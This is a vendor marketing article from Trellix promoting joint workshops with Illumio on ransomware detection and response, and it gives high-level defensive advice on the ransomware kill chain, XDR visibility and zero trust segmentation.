Ransomware has been the most prevalent form of cyber attack every year for the last decade. And it shows no sign of abating. Cyber criminals are coming up with new ways to monetise their attacks and employing more complex and sophisticated tactics.
Looking ahead to 2024, the Trellix Advanced Research Center predicts that more ransomware groups will contact the clients of their victims as a new way to apply pressure and increase their earnings.
What can you do to strengthen your security posture and protect your organisation? Trellix is partnering with Illumio on a series of Ransomware Detection and Response Workshops this December in the United States. Here are some key pointers from the workshops, with insights from Illumio Chief Evangelist, John Kindervag, widely known as the creator of zero trust.
Understand the anatomy of a ransomware attack and the ransomware kill chain
Ransomware attacks are sophisticated multi-stage operations that take place over time. The Trellix Advanced Research Center analysed more than 9 000 real-world attacks to develop a seven-stage kill chain model specific to ransomware.
During an early stage of the kill chain, such as reconnaissance, an attacker may be scanning your environment, gathering information and phishing for information. An XDR platform with a threat intelligence foundation helps organisations detect attacks at the earliest stages.
Ransomware grows more dangerous after initial access, as attackers move laterally through the network and hunt for valuable data to exfiltrate to a command and control server. Shutting down lateral movement and command and control is essential to reducing the impact of an attack. Yet many organisations are challenged to connect the dots across multiple siloed tools and prioritise threats amid alert “noise” during these phases – another reason XDR is essential.
Says Kindervag: “The most important thing that organisations need to understand is that they’re allowing command and control from the ransomware attacker to come into their network and access the data or asset that is being hit with a ransomware attack.”
Prepare by assessing your gaps and locating your crown jewels
Preparation is critical to combating ransomware. According to Trellix CISO Harold Rivas: “Regular security control assessments are crucial tools for identifying weak spots in systems.”
Your preparation should include simulated attacks and vulnerability scans. Ransomware isn’t like other cyber incidents, so it’s important to drill for it. Taking part in tabletop exercises, engaging professional services for vulnerability assessments, and staying abreast of new threat actors and tactics can all help you prepare.
It’s especially important before an attack to understand the critical data assets you’re protecting.
Says Kindervag: “Understand what data or assets you have that are really important and critical to your business function (data that you would be forced to pay a ransom on if it was held hostage because your operations couldn’t continue without it). That is precisely the data that attackers will target. There are two types of data in the world: there’s data that people want to steal and everything else. You protect the data that people want to steal. And if you don’t understand what that is, then you’re a juicy target for attackers.”
Gain visibility with XDR
Visibility is key to effective ransomware defence. The earlier in the ransomware kill chain that you can detect and respond to an attack, the better off you will be. By integrating multiple data sources and providing intelligent correlation across security controls and threat intelligence, XDR helps you detect and respond to an attack much earlier in the ransomware life cycle.
“XDR provides telemetry for visibility that can be vital to early detection and mitigation of ransomware attacks,” says Kindervag.
The Trellix XDR Platform minimises time to detection and resolution from days and weeks to hours and minutes.
Evolve your maturity
Ransomware detection and response maturity is a journey. Many organisations at early stages of their maturity have endpoint protection. Endpoint protection is foundational, but it’s not enough. Ransomware threat actors are increasingly using non-malicious tools to escape detection – what is commonly known as LoLBins (“living off the land” binaries and scripts) that are challenging for traditional endpoint protection to detect.
As you evolve from foundational ransomware resilience, layer additional security controls and link them through integrations. In the Trellix Ransomware Detection and Response Workshops, we cover increasing stages of ransomware resilience. Mature organisations may integrate EDR, XDR, NDR and other sophisticated technologies.
Explains Kindervag: “Much of cyber security is about creating friction so that the attacker will move off to a softer target. It’s often said that 'attackers don’t attack well-defended networks', and since attackers have a return on investment (ROI) that they must meet, they’re not going to spend much time in a zero trust environment that’s properly segmented. That’s because they recognise it’s fairly futile to get to the assets they want to steal or disrupt in order to monetise their business model. In short, micro-segmentation makes it harder for bad actors to realise a tangible ROI on their attacks.”
Implement a zero trust strategy
Zero trust principles of “never trust, always verify” arose from Kindervag’s time as VP and Principal Analyst at Forrester Research. At Illumio, a zero trust segmentation approach makes it difficult for cyber criminals to carry out their attacks.
Kindervag explains: “In zero trust, our primary control is a segmentation gateway that segments the data or asset into its own protect surface (essentially, the smallest possible reduction of the attack surface to the data, applications, assets and services that you need to protect). So, having visibility is number one. You’re trying to get visibility so that you can see the ransomware attack starting to happen and stop it from being successful. Having proper telemetry becomes really important as well. And then a way to operationalise that quickly, like with zero trust segmentation, so you can shut down the attack before it can do significant damage to the business.”
Share